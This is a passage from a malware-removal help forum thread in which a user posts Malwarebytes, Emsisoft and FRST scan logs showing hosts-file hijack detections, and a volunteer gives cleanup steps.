# This is a sample HOSTS file use) Good: () -> Replace on reboot. [5027cc2a3b6d46f04eb39cf64ab6ab55]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used by ) Good: () -> Replace on reboot. [2d4a8d69ebbdee48e8191d7514ec09f7]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [690e50a6c8e066d05fa26a28c13f54ac]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS f) Good: () -> Replace on reboot. [23544da9139564d2f1109cf67c84926e]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS f) Good: () -> Replace on reboot. [3641be38bfe99b9b639ea7eba35da45c]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS fi) Good: () -> Replace on reboot. [99dea74f6048033369985b37b44c27d9]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS fi) Good: () -> Replace on reboot. [690e7482159352e4cb36b0e2c13f52ae]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [c8af0fe76147a88e22df444ef10fad53]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (p.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [4c2b21d5f8b0c3736d94434ffb0517e9]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [1463ac4aa503082eea1795fdcb35c040]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [e196599d4f59a591c938821045bb6898]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS ) Good: () -> Replace on reboot. [adcaf6007533cf679f62ade505fbf010]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [294e8571e2c653e38c75573bdf21e51b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS fil) Good: () -> Replace on reboot. [6c0bd422862294a215ec1c7638c84fb1]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (osoft Corp.    
#    
# This is a sample HOSTS fi) Good: () -> Replace on reboot. [ccabb244fcac70c6976abdd597690af6]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [d1a6ef07dfc9310538c9f1a170909c64]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [78ff787ec5e3c96dac55fa986b9510f0]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file ) Good: () -> Replace on reboot. [c0b73eb805a34ee8857c4d459e62d12f]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [176045b161479d99887912804cb4d52b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [e6917a7c8028e4521fe2f69c44bcd52b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [94e380767335a4923fc25939e0209b65]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [0a6d5c9adfc994a24db4d1c15ca48e72]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [fb7cd422456321150ff29df5847cc739]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used by Micr) Good: () -> Replace on reboot. [a6d123d3d6d293a321e010824eb2e719]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used by Microsoft T) Good: () -> Replace on reboot. [3c3b49adb7f1d264cd34266c2dd39f61]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used by ) Good: () -> Replace on reboot. [7afd29cd2088f83eee130b8701ff9e62]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS fi) Good: () -> Replace on reboot. [89ee71855f4939fdbf420e84c04035cb]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [bbbcc333f4b458def40d8c060df37b85]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [d7a046b03f6916208d74731f9b659b65]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [adca93631296fb3b7889c1d1fd03cb35]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file used by ) Good: () -> Replace on reboot. [7205e90d545454e2e120eda56f91e51b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [9ed903f3149474c25ea3167c916f0bf5]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (osoft Corp.    
#    
# This is a sample HOSTS file ) Good: () -> Replace on reboot. [ef883cbabfe9e4529a67553d25db926e]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [88efba3cedbbae88a75a3959a35d25db]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS) Good: () -> Replace on reboot. [ef88ef07baee2214c63b672b97691fe1]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (crosoft Corp.    
#    
# This is a sample HOS) Good: () -> Replace on reboot. [591eb83e713772c42bd640529d630bf5]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [7cfb6f87dbcd42f41de4157d3ac6de22]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [9fd83cba8424b2842ad795fd946c47b9]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [cfa87581f0b84aec54ad5042fd03d22e]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [c3b4e51112965dd9ab5679190ff13bc5]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used by M) Good: () -> Replace on reboot. [383f18de832522144fb20d856b95ca36]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [ed8aea0c74342c0a35cc4949bc445ca4]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOS) Good: () -> Replace on reboot. [8aed876f3f69092de31e3a58b64a9e62]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (crosoft Corp.    
#    
# This is a sample HOSTS f) Good: () -> Replace on reboot. [f28571857236d165c43df39f7b85a858]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file use) Good: () -> Replace on reboot. [c3b49e587c2c67cf8f72e7abec14d927]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file used by M) Good: () -> Replace on reboot. [c7b02ccad9cfae88c23fe7ab19e719e7]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [fa7dd91d5c4c70c6bf42bfd329d76c94]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS file used by) Good: () -> Replace on reboot. [314633c3d4d4d56130d1a2f02fd16a96]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (
#    
# This is a sample HOSTS file used by Microsof) Good: () -> Replace on reboot. [e79036c0e9bf69cd3ac77a18cc349c64]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [87f036c07533cf67d62bdeb4817fa65a]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS) Good: () -> Replace on reboot. [cfa810e61791bd79f20f9af853ad7b85]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOST) Good: () -> Replace on reboot. [c3b41cda04a4a096a75a038ffe0245bb]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOSTS fil) Good: () -> Replace on reboot. [33440de92b7dfb3bcb364f438a760cf4]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [086f7482822653e33ec32c66c739f50b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [e5925c9a4860a096b44d048efe020ff1]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [0f680fe71a8eb48220e1a3ef53adba46]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (crosoft Corp.    
#    
# This is a sample HOST) Good: () -> Replace on reboot. [1d5a797deeba6ec89f6241513bc5ff01]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (oft Corp.    
#    
# This is a sample HOSTS file used ) Good: () -> Replace on reboot. [344382743f6977bf1fe2880a0ef21de3]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used by Mi) Good: () -> Replace on reboot. [d2a516e0387053e3d42d583a4bb552ae]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (    
#    
# This is a sample HOSTS file used by Microso) Good: () -> Replace on reboot. [45329363297f231350b14a48d03014ec]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (    
#    
# This is a sample HOSTS file used by ) Good: () -> Replace on reboot. [90e7f9fde9bf8caa99684d45fc048d73]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file used by Mic) Good: () -> Replace on reboot. [33440fe73e6ab6801ce51f73c04034cc]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (#    
# This is a sample HOSTS file used by Mi) Good: () -> Replace on reboot. [7afd787e05a3e25404fddeb479874eb2]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file used by M) Good: () -> Replace on reboot. [6f084ea8a10754e210f190026e929967]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [c0b736c03474d75f23de9bf7aa56fd03]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [403723d3b1f763d35fa2870ba060d729]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [aacdfafca602f2447d84f39fc23e58a8]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [22557b7b3a6e8caa7a871f7305fb52ae]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used by Mi) Good: () -> Replace on reboot. [037423d351574aecc33e6b27da264db3]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [05724da963454beb11f06b2745bb619f]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used by Micro) Good: () -> Replace on reboot. [80f744b28f19b38308f93260b749827e]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (.    
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [cbac53a3c4e4d561a55c108212eef30d]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file ) Good: () -> Replace on reboot. [24538670941434028879652d33cd40c0]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
 

******************************************************************************

 

My computer is just the same. It wasn't slow even with these malwares or virus. I guess running the MalwareBytes Anti-Malware daily somewhat helps... But I know that these unwanted software/programs need to go away for good. I was already considering making a full reformat when I stumbled on Sam's post. I'm glad I did.

 

Anyway, let me know what to do next.

 

Thank you again.



#4 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 11:47 AM

just in case, i have attached the files as well.

 

many thanks :-)

Attached Files



#5 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 11:52 AM

also, i have been checking task manager and i can no longer see SNARE and kitty. i hope they are gone for good. :-)



#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 28 April 2017 - 12:13 PM

1
ZN3USrZ.png Emsisoft Emergency Kit
  • Click here to download Emsisoft Emergency Kit. The download will automatically start after a moment.
  • Save EmsisoftEmergencyKit.exe to your Desktop.
  • Double click on EmsisoftEmergencyKit.exe (Windows Vista/7/8 users: Accept UAC warning if it is enabled). A screen like this will appear:
    dQVDkTW.png
  • Leave everything as it is, then click Extract. This will unpack Emsisoft Emergency Kit to the EEK folder located in the root drive (usually C:\).
  • Once the extraction is done, an icon qwL1Upn.png will appear on your Desktop. Double click it to start Emsisoft Emergency Kit.
  • Wait for Emsisoft Emergency Kit to finish loading signatures. A screen like this should appear:
    yEgPemv.png
  • Choose Yes, then wait for EEK to finish updating.
  • Choose Malware Scan under the Scan button. When EEK asks to activate PUP detection, choose Yes.
  • Wait for the scan to finish.
    RUeRoi4.png
  • If EEK detects something, all detected items will be displayed. Place a checkmark before everything, then choose Quarantine Selected.
  • If Emsisoft Emergency Kit asks to reboot, please do so immediately.
  • The scan log is located in Logs -> Scan Logs. Click on the entry of the latest scan, choose Export and save the report on your Desktop.
    P7FSALs.png
  • Please Copy and Paste the contents of the scan log in your next reply.
2.
Please run FRST again and post the new FRST .txt



Is the computer showing any signs of malware now?

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#7 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 12:53 PM

EEK Scan:

 

Emsisoft Emergency Kit - Version 2017.2
Scan log

Date    Scan Method    Objects Scanned    Objects Detected    Duration    Type    Computer Name    
29/04/2017 1:40:12 AM    Malware    77139    2    0:03:54    Manual scan    WIN10    
 

 

*****************************************************************************************************************************

 

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-04-2017
Ran by palaboy (administrator) on WIN10 (29-04-2017 01:46:09)
Running from C:\Users\palaboy\Downloads\Programs
Loaded Profiles: palaboy (Available Profiles: palaboy)
Platform: Windows 10 Pro Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
(Facebook) C:\Users\palaboy\AppData\Local\Facebook\Games\FacebookGameroom.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(The CefSharp Authors) C:\Users\palaboy\AppData\Local\Facebook\Games\Facebook Gameroom Browser.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Emsisoft Ltd) C:\EEK\bin64\a2emergencykit.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239104 2017-03-23] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe [263088 2017-04-12] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [Malwarebytes' Anti-Malware] => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe [462408 2012-04-04] (Malwarebytes Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26991304 2017-03-15] (Microsoft Corporation)
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53123712 2016-05-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [4014136 2017-04-27] (Tonec Inc.)
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
Startup: C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-04-14]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\palaboy\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)
Startup: C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-08]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{63d9886c-e056-4db5-92b9-677a71eb9bf8}: [DhcpNameServer] 192.168.1.1
ManualProxies:

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ph.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-12-11] (Internet Download Manager, Tonec Inc.)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2017-03-14] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2017-02-22] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-12-11] (Internet Download Manager, Tonec Inc.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-04-28] (Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2017-02-22] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-28] (Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-11-16] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-3175129382-567401783-3479919610-1001 -> hxxp://www.google.com

FireFox:
========
FF DefaultProfile: iuxxj1ya.default-1493381789762
FF ProfilePath: C:\Users\palaboy\AppData\Roaming\Mozilla\Firefox\Profiles\iuxxj1ya.default-1493381789762 [2017-04-29]
FF HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\Firefox\Extensions: [mozilla_cc3@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (No Name) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2017-04-26]
FF HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\palaboy\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\palaboy\AppData\Roaming\IDM\idmmzcc5 [2017-04-28] [not signed]
FF HKU\S-1-5-21-3175129382-567401783-3479919610-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-12] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-01-20] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-12] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-28] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-01-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-02-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3175129382-567401783-3479919610-1001: @citrixonline.com/appdetectorplugin -> C:\Users\palaboy\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-07-08] (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-01-12] (Microsoft Corporation)
